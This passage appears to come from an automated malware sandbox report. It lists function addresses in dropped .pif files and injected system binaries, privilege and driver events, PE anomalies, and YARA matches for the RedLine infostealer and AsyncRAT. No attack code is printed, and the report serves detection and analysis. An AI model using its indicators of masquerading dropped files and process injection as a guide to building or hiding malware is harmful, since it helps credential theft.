Source: C:\Users\Public\alpha.pif	Code function: 17_2_00024EC1	17_2_00024EC1
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00016B20	17_2_00016B20
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00020740	17_2_00020740
Source: C:\Users\Public\alpha.pif	Code function: 17_2_00020BF0	17_2_00020BF0
Source: C:\Users\Public\xpha.pif	Code function: 18_2_00891E26	18_2_00891E26
Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_0074A810	22_2_0074A810
Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_00727C00	22_2_00727C00
Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_00752D40	22_2_00752D40
Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_007279F0	22_2_007279F0
Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_0074EEB0	22_2_0074EEB0
Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_007492A0	22_2_007492A0
Source: C:\Windows\System32\AppVClient.exe	Code function: 22_2_007493B0	22_2_007493B0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_0096A810	25_2_0096A810
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_00947C00	25_2_00947C00
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_009479F0	25_2_009479F0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_00972D40	25_2_00972D40
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_0096EEB0	25_2_0096EEB0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_009692A0	25_2_009692A0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 25_2_009693B0	25_2_009693B0
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 27_2_029B20C4	27_2_029B20C4
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_022B92A0	28_2_022B92A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_022BEEB0	28_2_022BEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_022B93B0	28_2_022B93B0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_02297C00	28_2_02297C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_022BA810	28_2_022BA810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_022C2D40	28_2_022C2D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 28_2_022979F0	28_2_022979F0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00408C60	30_2_00408C60
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_0040DC11	30_2_0040DC11
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00407C3F	30_2_00407C3F
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00418CCC	30_2_00418CCC
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00406CA0	30_2_00406CA0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_004028B0	30_2_004028B0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_0041A4BE	30_2_0041A4BE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00418244	30_2_00418244
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00401650	30_2_00401650
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00402F20	30_2_00402F20
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_004193C4	30_2_004193C4
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00418788	30_2_00418788
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00402F89	30_2_00402F89
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_00402B90	30_2_00402B90
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_004073A0	30_2_004073A0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_1004515C	30_2_1004515C
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10035980	30_2_10035980
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10006EAF	30_2_10006EAF
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_100439A3	30_2_100439A3
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_100051EE	30_2_100051EE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_1003D580	30_2_1003D580
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10007F80	30_2_10007F80
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_10033780	30_2_10033780
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_1003C7F0	30_2_1003C7F0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_26811021	30_2_26811021
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_2_26811030	30_2_26811030
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00408C60	30_1_00408C60
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_0040DC11	30_1_0040DC11
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00407C3F	30_1_00407C3F
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00418CCC	30_1_00418CCC
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00406CA0	30_1_00406CA0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_004028B0	30_1_004028B0
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_0041A4BE	30_1_0041A4BE
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00418244	30_1_00418244
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00401650	30_1_00401650
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00402F20	30_1_00402F20
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_004193C4	30_1_004193C4
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00418788	30_1_00418788
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00402F89	30_1_00402F89
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_00402B90	30_1_00402B90
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: 30_1_004073A0	30_1_004073A0
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: 36_2_029D20C4	36_2_029D20C4

Enables driver privileges

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Enables security privileges

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02AF44DC appears 74 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B089D0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02AF4500 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02AF4860 appears 949 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B0894C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02AF46D4 appears 244 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: String function: 029D4860 appears 683 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: String function: 029E894C appears 50 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: String function: 029D46D4 appears 155 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: String function: 029B4860 appears 683 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: String function: 029B46D4 appears 155 times
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Code function: String function: 029C894C appears 50 times
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: String function: 0040D606 appears 72 times
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Code function: String function: 0040E1D8 appears 129 times

PE file contains executable resources (Code or Archives)

Source: Acrobat.exe.12.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.12.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.12.dr	Static PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
Source: setup.exe0.12.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: setup.exe0.12.dr	Static PE information: Resource name: RT_STRING type: PDP-11 pure executable not stripped
Source: 117.0.5938.132_chrome_installer.exe.12.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.4
Source: 117.0.5938.132_chrome_installer.exe.12.dr	Static PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression

PE file contains more sections than normal

Source: ie_to_edge_stub.exe.12.dr	Static PE information: Number of sections : 11 > 10
Source: identity_helper.exe.12.dr	Static PE information: Number of sections : 12 > 10
Source: elevation_service.exe0.12.dr	Static PE information: Number of sections : 12 > 10
Source: chrmstp.exe.12.dr	Static PE information: Number of sections : 14 > 10
Source: elevation_service.exe.12.dr	Static PE information: Number of sections : 12 > 10
Source: msedgewebview2.exe.12.dr	Static PE information: Number of sections : 14 > 10
Source: setup.exe1.12.dr	Static PE information: Number of sections : 13 > 10
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: Number of sections : 13 > 10
Source: setup.exe0.12.dr	Static PE information: Number of sections : 14 > 10

Spawns drivers

Source: unknown

Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys

Yara signature match

Source: 38.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 30.2.wdmvmswJ.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 30.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 30.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 30.2.wdmvmswJ.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 38.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 38.2.wdmvmswJ.pif.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 38.2.wdmvmswJ.pif.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000026.00000001.1748961423.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001E.00000001.1659980996.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001E.00000002.1740115481.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000026.00000002.1813978225.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: Acrobat.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: appvcleaner.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVShNotify.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: IntegratedOffice.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MavInject32.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OfficeC2RClient.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
